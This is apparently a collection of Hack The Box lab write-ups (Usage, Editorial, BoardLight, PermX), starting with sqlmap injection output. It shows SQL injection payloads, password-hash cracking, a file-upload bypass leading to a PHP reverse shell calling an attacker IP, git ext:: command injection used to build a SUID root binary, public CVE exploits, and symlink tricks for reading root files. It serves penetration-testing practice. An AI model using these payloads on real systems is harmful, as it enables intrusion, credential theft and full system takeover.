Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold' AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue

    Type: time-based blind
    Title: MySQL > 5.0.12 AND time-based blind (heavy query)
    Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold' AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX
---
[23:30:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL > 5.0.12
[23:30:23] [INFO] fetching columns for table 'users' in database 'usage_blog'
[23:30:23] [INFO] retrieved: you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests?
[Y/n] Y
8
[23:30:32] [INFO] retrieving the length of query output
[23:30:32] [INFO] retrieved: 10
[23:31:00] [INFO] retrieved: created_at
[23:31:00] [INFO] retrieving the length of query output
[23:31:00] [INFO] retrieved: 9
[23:31:16] [INFO] retrieved: timestamp
[23:31:16] [INFO] retrieving the length of query output
[23:31:16] [INFO] retrieved: 5
[23:31:34] [INFO] retrieved: email <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[23:31:34] [INFO] retrieving the length of query output
[23:31:34] [INFO] retrieved: 12
[23:32:10] [INFO] retrieved: varchar(255)
[23:32:10] [INFO] retrieving the length of query output
[23:32:10] [INFO] retrieved: 17
[23:32:54] [INFO] retrieved: email_verified_at
[23:32:54] [INFO] retrieving the length of query output
[23:32:54] [INFO] retrieved: 9
[23:33:21] [INFO] retrieved: timestamp
[23:33:21] [INFO] retrieving the length of query output
[23:33:21] [INFO] retrieved: 2
[23:33:42] [INFO] retrieved: id
[23:33:42] [INFO] retrieving the length of query output
[23:33:42] [INFO] retrieved: 15
[23:34:15] [INFO] retrieved: bigint unsigned
[23:34:16] [INFO] retrieving the length of query output
[23:34:15] [INFO] retrieved: 4
[23:34:38] [INFO] retrieved: name
[23:34:38] [INFO] retrieving the length of query output
[23:34:38] [INFO] retrieved: 12
[23:35:37] [INFO] retrieved: varchar(255)
[23:35:37] [INFO] retrieving the length of query output
[23:35:37] [INFO] retrieved: 8
[23:36:10] [INFO] retrieved: password <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
[23:36:10] [INFO] retrieving the length of query output
[23:36:10] [INFO] retrieved: 12
[23:37:11] [INFO] retrieved: varchar(255)
[23:37:11] [INFO] retrieving the length of query output
[23:37:11] [INFO] retrieved: 14
[23:37:20] [INFO] retrieved: ______________
[23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[23:38:06] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue?
[y/N] N
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[23:39:07] [INFO] retrieved:
[23:39:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[23:39:07] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[23:39:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 477 times
[23:39:37] [INFO] fetched data logged to text files under '/home/leopold/.local/share/sqlmap/output/usage.htb'
[23:39:37] [WARNING] your sqlmap version is outdated

[*] ending @ 23:39:37 /2024-08-06/

$ sqlmap -r request.txt --data="_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold" -p email --batch --level 5 --risk 3 --threads 10 -D usage_blog -T users -C email --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:34:07 /2024-08-06/

[23:34:07] [INFO] parsing HTTP request from 'request.txt'
[23:34:07] [INFO] resuming back-end DBMS 'mysql'
[23:34:07] [INFO] testing connection to the target URL
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request.
Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold' AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue

    Type: time-based blind
    Title: MySQL > 5.0.12 AND time-based blind (heavy query)
    Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold' AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX
---
[23:34:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL > 5.0.12
[23:34:10] [INFO] fetching entries of column(s) 'email' for table 'users' in database 'usage_blog'
[23:34:10] [INFO] fetching number of column(s) 'email' entries for table 'users' in database 'usage_blog'
[23:34:10] [INFO] retrieved: you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests?
[Y/n] Y
5
[23:34:19] [INFO] retrieving the length of query output
[23:34:19] [INFO] retrieved: 23
[23:35:24] [INFO] retrieved: brm@brunorochamoura.com
[23:35:24] [INFO] retrieving the length of query output
[23:35:24] [INFO] retrieved: 15
[23:36:21] [INFO] retrieved: davy@wavy.gravy
[23:36:21] [INFO] retrieving the length of query output
[23:36:21] [INFO] retrieved: 11
[23:37:09] [INFO] retrieved: raj@raj.com
[23:37:09] [INFO] retrieving the length of query output
[23:37:09] [INFO] retrieved: 13
[23:37:20] [INFO] retrieved: _____________

$ sqlmap -r request.txt --data="_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold" -p email --batch --level 5 --risk 3 --threads 10 -D usage_blog -T users -C password --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:34:22 /2024-08-06/

[23:34:22] [INFO] parsing HTTP request from 'request.txt'
[23:34:22] [INFO] resuming back-end DBMS 'mysql'
[23:34:22] [INFO] testing connection to the target URL
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location?
[Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue Type: time-based blind Title: MySQL \u0026gt; 5.0.12 AND time-based blind (heavy query) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX --- [23:34:25] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.18.0 back-end DBMS: MySQL \u0026gt; 5.0.12 [23:34:25] [INFO] fetching entries of column(s) \u0026#39;password\u0026#39; for table \u0026#39;users\u0026#39; in database \u0026#39;usage_blog\u0026#39; [23:34:25] [INFO] fetching number of column(s) \u0026#39;password\u0026#39; entries for table \u0026#39;users\u0026#39; in database \u0026#39;usage_blog\u0026#39; [23:34:25] [INFO] retrieved: you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y 5 [23:34:38] [INFO] retrieving the length of query output [23:34:38] [INFO] retrieved: 60 [23:37:09] [INFO] retrieved: $2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4. [23:37:09] [INFO] retrieving the length of query output [23:37:09] [INFO] retrieved: 60 [23:37:19] [INFO] retrieved: ____________________________________________________________ 1 2 3 4 5 brm@brunorochamoura.com davy@wavy.gravy raj@raj.com $2y$10$7ALmTTEYfRVd8Rnyep/ck.bSFKfXfsltPLkyQqSp/TT7X1wApJt4. 
Password cracking

We run a brute-force attack with john and find the following password for the discovered hash: xander

raj@raj.com account

After a few attempts, we find the following credentials to log in to the website:

raj@raj.com : xander

In reality this user account is useless. However, I found other tables holding the admin users.

Admin user

Database: usage_blog
[15 tables]
+------------------------+
| admin_menu             |
| admin_operation_log    |
| admin_permissions      |
| admin_role_menu        |
| admin_role_permissions |
| admin_role_users       |
| admin_roles            |
| admin_user_permissions |
| admin_users            |
| blog                   |
| failed_jobs            |
| migrations             |
| password_reset_tokens  |
| personal_access_tokens |
| users                  |
+------------------------+

Database: usage_blog
Table: admin_users
[8 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| avatar         | varchar(255) |
| created_at     | timestamp    |
| id             | int unsigned |
| name           | varchar(255) |
| password       | varchar(60)  |
| remember_token | varchar(100) |
| updated_at     | timestamp    |
| username       | varchar(190) |
+----------------+--------------+

Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

Crack admin password

admin : whatever1

john hash.txt --wordlist=~/wordlists/rockyou.txt
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X2])
Remaining 1 password hash
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:20 0% 0g/s 45.39p/s 45.39c/s 45.39C/s wesley..sandy
whatever1        (?)
1g 0:00:00:34 100% 0.02906g/s 47.42p/s 47.42c/s 47.42C/s alexis1..punkrock
Use the "--show" option to display all of the cracked passwords reliably
Session completed
~/github/Hacking/HackTheBox/Machines/Usage (main*) » john hash.txt --wordlist=~/wordlists/rockyou.txt --show    leopold@leopold-ZenBook-UX434FAC-UX434FA
Invalid options combination or duplicate option: "--show"
~/github/Hacking/HackTheBox/Machines/Usage (main*) » john hash.txt --show
?:xander
?:whatever1

PHP web shell - dash user

We can now log in to the admin platform. The link to this subdomain was available on the home page. Once logged in, we find a settings page that lets us change the admin user's avatar.

We can then upload an image file. A reverse shell can be hidden in a gif file or another format. At upload time, we intercept the request with Burp and change the file name to ".php".

A button appears on the page letting us download the image file.
By grabbing that link we find where the file is located (and where the uploads folder is): http://admin.usage.htb/uploads/images/revshell.php

All that remains is to start a netcat listener on our own machine and open a shell on the target to retrieve the user flag:

$ nc -lvnp 6789
Listening on 0.0.0.0 6789
Connection received on 10.10.11.18 35690
Linux usage 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 23:32:32 up  1:54,  0 users,  load average: 2.39, 2.47, 2.58
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(dash) gid=1000(dash) groups=1000(dash)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
dash@usage:/$ export TERM=xterm
export TERM=xterm
dash@usage:/$ ^Z
[1]  + 21472 suspended  nc -lvnp 6789
~/github/Hacking/HackTheBox/Machines/Usage (main*) » stty raw -echo;
[1]  + 21472 continued  nc -lvnp 6789
dash@usage:/$ whoami
dash
dash@usage:/$ ls
bin   dev  home  lib32  libx32      media  opt   root  sbin  srv  tmp  var
boot  etc  lib   lib64  lost+found  mnt    proc  run   snap  sys  usr
dash@usage:/$ cd
dash@usage:~$ ls
user.txt
dash@usage:~$ pwd
/home/dash
dash@usage:~$ cat user.txt
5313.....4bcc

To exploit the flaw, you therefore needed at minimum to select a file with a valid image extension (and the right magic bytes? I had put GIF8 at the start of the file just in case). Once past that step, pressing submit and modifying the request on the fly, there is no further check on the uploaded file, so changing it to php causes no problem at all.

dash -> xander

mmonit service: user password?

The server uses the mmonit service. An interesting .monitrc file can be found on the server:

cat .monitrc
#Monitoring Interval in Seconds
set daemon 60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:3nc0d3d_pa$$w0rd

#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
     if cpu > 80% for 2 cycles then alert

#System Monitoring
check system usage
    if memory usage > 80% for 2 cycles then alert
    if cpu usage (user) > 70% for 2 cycles then alert
    if cpu usage (system) > 30% then alert
    if cpu usage (wait) > 20% then alert
    if loadavg (1min) > 6 for 2 cycles then alert
    if loadavg (5min) > 4 for 2 cycles then alert
    if swap usage > 5% then alert

check filesystem rootfs with path /
    if space usage > 80% then alert

We find the creds: allow admin:3nc0d3d_pa$$w0rd

Xander user pwned

The password is in fact the one of user xander… In /home there is indeed a "xander" folder that I had not noticed at first:

xander : 3nc0d3d_pa$$w0rd

xander -> root

mysql password

In the website's .env file:

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=usage_blog
DB_USERNAME=staff
DB_PASSWORD=s3cr3t_c0d3d_1uth

Backup script as root

See the references to understand the exploit. In short, we can run with sudo a command that backs up the website, i.e. the files in /var/www/html. We can create a symbolic link to the flag file /root/root.txt and, thanks to a flaw in how 7z handles a file named @root.txt when it is executed, we can recover the contents of the file.
See the hacktricks reference.

xander@usage:/var/www/html$ touch @root.txt
xander@usage:/var/www/html$ ln -s /root/root.txt root.txt
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7513 32-Core Processor (A00F11),ASM,AES-NI)

Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54851331

Scanning the drive:

WARNING: No more files
0e99.....4e1b

2984 folders, 17981 files, 114323032 bytes (110 MiB)

References

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Then, when 7z is executed, it will treat root.txt as a file containing the list of files it should compress (that's what the existence of @root.txt indicates), and when 7z reads root.txt it will read /file/you/want/to/read; as the content of this file isn't a list of files, it will throw an error showing the content.

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks?source=post_page-----16397895490f--------------------------------

(Title: HTB | Usage, date: 2024-08-08, permalink: https://leopoldabgn.github.io/writeups/p/usage-htb/)

Machine name | OS    | IP          | Difficulty
Editorial    | Linux | 10.10.11.20 | Easy

Enumeration

nmap

Nmap scan report for editorial.htb (10.10.11.20)
Host is up (0.65s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
7002/tcp filtered afs3-prserver

Notes

submissions@tiempoarriba.htb
http://127.0.0.1:5000/api/latest/metadata/messages/authors

Foothold

SSRF

POST /upload-cover HTTP/1.1
...
------WebKitFormBoundaryNBB1NG9hyA1AyOej
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/api/latest/metadata/messages/authors
------WebKitFormBoundaryNBB1NG9hyA1AyOej
Content-Disposition: form-data; name="bookfile"; filename="2664593.png"
Content-Type: image/png

PNG
...

In the API response we get the creds: user: dev password: dev080217_devAPI!@

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 04 Aug 2024 23:44:11 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: keep-alive
Content-Disposition: inline; filename=f84e3727-b58e-4a33-8cae-f439b5a6a997
Last-Modified: Sun, 04 Aug 2024 23:44:11 GMT
Cache-Control: no-cache
ETag: "1722815051.1237798-506-4116584587"

{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

SSH to user and prod

We find a git repo. Moving through the commits:

After logging in as user, we find a python file with another user's creds: user: prod pass: 080217_Producti0n_2023!@

def api_mail_new_authors():
    return jsonify({
        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
    })

Privilege Escalation

We use the prod account.

Enumeration

prod@editorial:~$ sudo -l
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

clone_prod_change.py as root

cat exploit.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main() {
    setuid(0);
    setgid(0);
    system("cat /root/root.txt");
    return 0;
}

Next, we compile the file as root, so the exploit binary is created with root as its owner. It is then enough to run chmod +s, which sets the SUID bit. The SUID bit lets a binary run as if we were its owner, even when we are not logged in as root. When the binary runs it performs a cat and we get the root flag.

prod@editorial:~$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c gcc% /home/prod/exploit.c% -o% /home/prod/exploit"
...
...
prod@editorial:~$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c chmod% +s% /home/prod/exploit"
...
...
prod@editorial:~$ ls -l
...
-rwsr-sr-x 1 root root 16048 Aug  5 22:47 exploit
-rw-rw-r-- 1 prod prod   114 Aug  5 22:45 exploit.c
prod@editorial:~$ ./exploit
7e05.....dea0

BONUS

This variant gets a shell. As simple as the other one…

#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}

# Commands to compile and chmod +s...
# ....
prod@editorial:~$ ./exploit2
root@editorial:~# whoami
root
root@editorial:~# cd /root
root@editorial:/root# ls
root.txt
root@editorial:/root# cat root.txt
7e05.....dea0

FINAL BONUS

There was a much faster way… We cat the file and write the output into prod's /home… Then all that is left is to cat that file…

$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c cat% /root/root.txt% >% /home/prod/hehe"
$ cat hehe
7e05.....dea0

(Title: HTB | Editorial, date: 2024-08-06, permalink: https://leopoldabgn.github.io/writeups/p/editorial-htb/)

Machine name | OS    | IP          | Difficulty
BoardLight   | Linux | 10.10.11.11 | Easy

Users

larissa : serverfun2$2023!!
Enumeration

nmap

Ports 80 and 443 (http and https) are open.

Foothold

board.htb -> crm.board.htb

Subdomain attack:

gobuster dns -d board.htb -t 50 -w /usr/share/wordlists/dnsmap.txt
===============================================================
Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     board.htb
[+] Threads:    50
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/dnsmap.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: crm.board.htb

Login page (crm.board.htb)

We have access to a login page. User: admin password: admin

Dashboard - RCE

On the Dolibarr dashboard we can create a website. We can edit its HTML code and put PHP code in it. To do so the tag has to be altered, because we do not have permission to insert php:

<?phP echo "haa"; ?>

PHP reverse shell code.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.16.48';  // CHANGE THIS
$port = 6789;         // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

Then we just put our PHP reverse shell in the page and open it. In our terminal we wait for the connection with: nc -lnvp 6789

User flag

Looking through the web server's configuration files, we find a password: serverfun2$2023!! In /home we previously observed the user larissa. We assume this is her password, and it works!

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat * | grep pass
...
$dolibarr_main_db_pass='serverfun2$2023!!';
...
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su larissa
Password:
larissa@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ cat ~/user.txt
6e47.....36af
^C
$ ssh larissa@10.10.11.11
Password: serverfun2$2023!!

Privilege Escalation

Enumeration: LinPEAS

Running linpeas again from larissa's account, we find binaries that look like vulnerable SUID binaries.

══════════╣ SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

CVE-2022-37706: SUID binary Enlightenment v0.25.3 - Privilege escalation

https://www.exploit-db.com/exploits/51180

Running the exploit.sh file found on github gives root access directly. This flaw lets the script locate a vulnerable SUID binary on the machine and then use it to obtain a shell as root.

$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# cat /root/root.txt
2de2.....893c

(Title: HTB | BoardLight, date: 2024-08-04, permalink: https://leopoldabgn.github.io/writeups/p/boardlight-htb/)

Machine name | OS    | IP          | Difficulty
PermX        | Linux | 10.10.11.23 | Easy

Enumeration

nmap

Port 80 (http) is open.

Foothold: www-data

permx.htb

When accessing port 80 in a browser, we are redirected to permx.htb. I added it to /etc/hosts and reached a website.

subdomain / vhost attack

# Finds nothing...
$ gobuster dns -d permx.htb -t 50 -w /usr/share/wordlists/dnsmap.txt

# Works! (Apparently much more reliable than gobuster dns for finding subdomains and vhosts...)
$ ffuf -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -u http://permx.htb/ -H "Host: FUZZ.permx.htb" -mc 200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://permx.htb/
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.permx.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 544ms]
lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 502ms]

We find the subdomains:

www
lms

www.permx.htb: returns the same page as permx.htb

lms.permx.htb: returns a "Chamilo" login page

directory/file enumeration

gobuster dir -u lms.permx.htb -w ~/wordlists/common.txt -t 100
===============================================================
Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://lms.permx.htb
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /home/leopold/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/app                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/app/]
/bin                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/bin/]
/certificates         (Status: 301) [Size: 321] [--> http://lms.permx.htb/certificates/]
/.htaccess            (Status: 403) [Size: 278]
/documentation        (Status: 301) [Size: 322] [--> http://lms.permx.htb/documentation/]
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/favicon.ico          (Status: 200) [Size: 2462]
/index.php            (Status: 200) [Size: 19356]
/LICENSE              (Status: 200) [Size: 35147]
/main                 (Status: 301) [Size: 313] [--> http://lms.permx.htb/main/]
/plugin               (Status: 301) [Size: 315] [--> http://lms.permx.htb/plugin/]
/robots.txt           (Status: 200) [Size: 748]
/server-status        (Status: 403) [Size: 278]
/src                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/src/]
/vendor               (Status: 301) [Size: 315] [--> http://lms.permx.htb/vendor/]
/web                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/web/]
/web.config           (Status: 200) [Size: 5780]

We notably find the web.config file, which looks interesting.
(Ultimately useless.)

Chamilo LMS CVE-2023-4220 Exploit

Searching online, we find a 2023 CVE on Chamilo that allows uploading and then executing a php file on the machine: Exploit Title: Chamilo LMS CVE-2023-4220 Exploit

Using the CVE, we upload a php reverse shell:

./CVE-2023-4220.sh -f ../php-reverse-shell.php -h http://lms.permx.htb/ -p 6789
-e The file has successfully been uploaded.
-e # Use This leter For Interactive TTY ;)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
# export TERM=xterm
# CTRL + Z
# stty raw -echo; fg
-e # Starting Reverse Shell On Port 6789 . . . . . . .
-e Listening on 0.0.0.0 6789
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.52 (Ubuntu) Server at lms.permx.htb Port 80</address>
</body></html>
ls
Connection received on 10.10.11.23 56516
Linux permx 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 14:35:56 up  5:55,  2 users,  load average: 0.00, 0.14, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
$
$ bin  boot  dev  etc  home  lib  lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr

Then we request the file that is now present in the upload folder, which opens the reverse shell:

http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/reverseshell.php

www-data -> mtz

User found: mtz

We find the user mtz in /home.

configuration.php: mtz password

After running linpeas.sh, we find a password:

╔══════════╣ Searching passwords in config PHP files
/var/www/chamilo/app/config/configuration.php:    'show_password_field' => false,
/var/www/chamilo/app/config/configuration.php:    'show_password_field' => true,
...
/var/www/chamilo/app/config/configuration.php:$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
...

We can now log in as user mtz with the password 03F6lY3uXAP2bkW8:

www-data@permx:/home$ su mtz
Password: 03F6lY3uXAP2bkW8
mtz@permx:/home$ cat us
cat: us: No such file or directory
mtz@permx:/home$ ls
mtz
mtz@permx:/home$ cd mtz/
mtz@permx:~$ cat user.txt
a45e.....7836

Privilege Escalation

/opt/acl.sh as root

Running sudo -l, we see that we can execute the following script as root: /opt/acl.sh

#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

It lets us change the permissions of any file.
However, the file has to be under /home/mtz and it has to be a regular file, not a symbolic link.

The technique therefore consists of creating two symbolic links that lead to the file we are interested in. Then we change the permissions.

